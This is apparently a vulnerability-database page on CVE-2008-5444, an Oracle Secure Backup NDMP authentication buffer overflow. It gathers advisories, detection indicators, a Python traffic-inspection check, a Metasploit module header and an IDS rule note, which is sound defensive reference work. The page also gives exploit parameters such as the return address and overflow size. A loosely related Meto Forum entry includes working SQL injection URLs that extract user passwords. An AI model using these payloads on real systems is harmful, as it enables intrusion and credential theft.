CVE-2008-5444
Published 2009-01-14
Priority P269 · critical · CVSS 2.0: 10
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 60.62% (99.0th percentile)
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5448 and CVE-2008-5449.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | secure_backup | — | — |
Detection & IOCs (extracted from sources)
bytes: \x81\xc4\x54\xf2\xff\xff
- Detect exploitation attempts by monitoring for oversized NDMP_CONNECT_CLIENT_AUTH packets (username field ~3789+ bytes) sent to TCP port 10000 targeting Oracle Secure Backup.
- Alert on NDMP message type 0x901 (NDMP_CONNECT_CLIENT_AUTH) on TCP/10000 with abnormally large username length fields (N-packed value exceeding normal bounds).
- Look for the stack-adjustment prepend encoder byte sequence \x81\xc4\x54\xf2\xff\xff in the payload body of NDMP traffic on port 10000 as a shellcode indicator.
- Monitor for return-address value 0x608f5a28 (oracore10.dll) appearing in network traffic to TCP/10000, indicating exploitation targeting Windows 2003 SP0 / XP SP3.
- Caveat: the Metasploit module only targets Oracle Secure Backup 10.1.0.3 on Windows 2003 SP0 and Windows XP SP3; the ROP/return address (0x608f5a28 in oracore10.dll) is version-specific and will not work against other builds.
- Caveat: the payload space is limited to 1024 bytes and null bytes (\x00) are bad characters; detections relying on raw shellcode patterns must account for encoding.
- Caveat: the exploit uses a StackAdjustment of -3500 bytes via the prepend encoder, meaning the actual shellcode execution context is significantly offset from the overflow point.
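The first three detection points above can be combined into one stream check. The following is an added example, not code from this page or from any of the projects it cites. It assumes standard NDMP framing (a 4-byte XDR record mark, a 24-byte header of six big-endian words, then `auth_type` and a length-prefixed identifier); the names `inspect_ndmp`, `build_auth` and the bound `MAX_AUTH_ID_LEN` are hypothetical.

```python
import struct

NDMP_CONNECT_CLIENT_AUTH = 0x901             # message type named on this page
STACK_ADJUST = b"\x81\xc4\x54\xf2\xff\xff"   # byte sequence listed on this page
MAX_AUTH_ID_LEN = 256                        # assumed policy bound, tune per site
HDR = 24                                     # six big-endian uint32 header words

def inspect_ndmp(stream: bytes) -> list:
    """Scan one reassembled client-to-server TCP/10000 stream; return findings."""
    findings, off = [], 0
    while off + 4 <= len(stream):
        (mark,) = struct.unpack_from(">I", stream, off)
        length = mark & 0x7FFFFFFF           # low 31 bits of the record mark
        record = stream[off + 4: off + 4 + length]
        off += 4 + length
        if len(record) < HDR + 8:            # header + auth_type + length word
            continue
        message = struct.unpack_from(">6I", record, 0)[3]
        if message != NDMP_CONNECT_CLIENT_AUTH:
            continue
        _auth_type, id_len = struct.unpack_from(">2I", record, HDR)
        if id_len > MAX_AUTH_ID_LEN:
            findings.append(("oversized_auth_id", id_len))
        if id_len > len(record) - (HDR + 8): # declared length overruns the record
            findings.append(("length_exceeds_record", id_len))
        pos = record.find(STACK_ADJUST, HDR + 8)
        if pos != -1:
            findings.append(("stack_adjust_bytes", pos - (HDR + 8)))
    return findings

def build_auth(auth_id: bytes, password: bytes = b"pw") -> bytes:
    """Constructed sample request (not captured traffic) for exercising the check."""
    def xdr(s):                              # XDR string: length, data, pad to 4
        return struct.pack(">I", len(s)) + s + b"\x00" * (-len(s) % 4)
    body = struct.pack(">6I", 1, 0, 0, NDMP_CONNECT_CLIENT_AUTH, 0, 0)
    body += struct.pack(">I", 1) + xdr(auth_id) + xdr(password)
    return struct.pack(">I", 0x80000000 | len(body)) + body

if __name__ == "__main__":
    normal = build_auth(b"backupadmin")
    oversized = build_auth(b"A" * 3789)      # filler only, sized per the page
    print(inspect_ndmp(normal + oversized))
```

Because the check keys on the declared length rather than on payload bytes, it still fires when the shellcode is encoded, which is the limitation the caveats above raise for raw-pattern matching.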
GHSA
GHSA-f7pp-x8v9-66hm · CVE-2008-5444 [CRITICAL] · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5448 and CVE-2008-5449.
GHSA
GHSA-x6hv-vghf-34rm · CVE-2008-5449 [CRITICAL] · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5448.
GHSA
GHSA-qpj8-xcmr-qg4j · CVE-2008-5448 [CRITICAL] · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5449.
No detection rules found.
Exploit-DB
Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)
exploitdb · 2010-05-09 · CVE-2008-5444
---
```ruby
##
# $Id: osb_ndmp_auth.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow',
      'Description' => %q{
        The module exploits a stack buffer overflow in Oracle Secure Backup.
        When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,
        an attacker may be able to execute arbitrary code.
      },
      'Author'      => [ 'MC' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 9262 $',
```
Exploit-DB
Meto Forum 1.1 - Multiple SQL Injections
exploitdb · 2008-05-13 · CVE-2008-2448
---
Meto Forum v1.1 Multiple Remote SQL Injection Vulnerabilities
Script : http://www.aspindir.com/goster/5444
Risk : All forum users' saved passwords can be taken.
Coded : Asp , SQL Language = 'Access'
---
EİP [1] Exploit:
http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test
Log in to Admin Panel > cookie saved.
This script file has an SQL injection attack.
http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6
http://localhost:2222/lab/M
Metasploit
Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
metasploit
The module exploits a stack buffer overflow in Oracle Secure Backup. When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, an attacker may be able to execute arbitrary code.
Talos
## Rule release for today - January 27th 2009
blogs_talos · 2009-01-27 · CVSS 10.0 · CVE-2008-4006 [CRITICAL]
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
Oracle Secure Backup Command Injection (CVE-2008-4006)
Oracle BPEL Injection (CVE-2008-4014)
Oracle Secure Backup Command Injection (CVE-2008-5440)
Oracle Secure Backup Buffer Overflow (CVE-2008-5444)
Oracle Secure Backup Command Injection (CVE-2008-5448)
Oracle Secure Backup Command Injection (CVE-2008-5449)
Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
- http://secunia.com/advisories/33525
- http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html
- http://www.securityfocus.com/bid/33177
- http://www.vupen.com/english/advisories/2009/0115
Published: 2009-01-14